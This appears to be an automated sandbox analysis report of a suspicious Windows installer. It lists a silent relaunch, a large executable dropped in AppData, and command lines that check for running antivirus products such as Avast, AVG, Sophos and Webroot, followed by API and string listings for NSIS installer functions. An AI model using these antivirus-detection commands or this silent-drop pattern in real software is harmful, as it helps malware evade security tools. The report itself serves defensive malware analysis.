Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:56:16
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"
Imagebase:	0xfc0000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 14%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:56:18
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$60456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"
Imagebase:	0xdd0000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:56:19
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT
Imagebase:	0xfc0000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	11:56:19
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$70456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT
Imagebase:	0x420000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	11:56:45
Start date:	29/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	"timeout" 9
Imagebase:	0x7ff6ab760000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:56:45
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:56:54
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff659080000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:56:55
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:56:56
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff6b9290000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:56:56
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	11:56:56
Start date:	29/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff788ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:56:56
Start date:	29/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff6f0260000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	11:57:00
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Imagebase:
File size:	846'325'235 bytes
MD5 hash:	6A8860A8150021B2D5B9BB707DE4FA37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182
{, xrefs: 00405352

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

_?=, xrefs: 00403A64
1C, xrefs: 00403B56
~nsu.tmp, xrefs: 00403AF7
NSIS Error, xrefs: 004038E2
SeShutdownPrivilege, xrefs: 00403C16
NCRC, xrefs: 0040397C
/D=, xrefs: 004039A6
\Temp, xrefs: 00403A1B
Error launching installer, xrefs: 00403A7D

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 00406A53

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
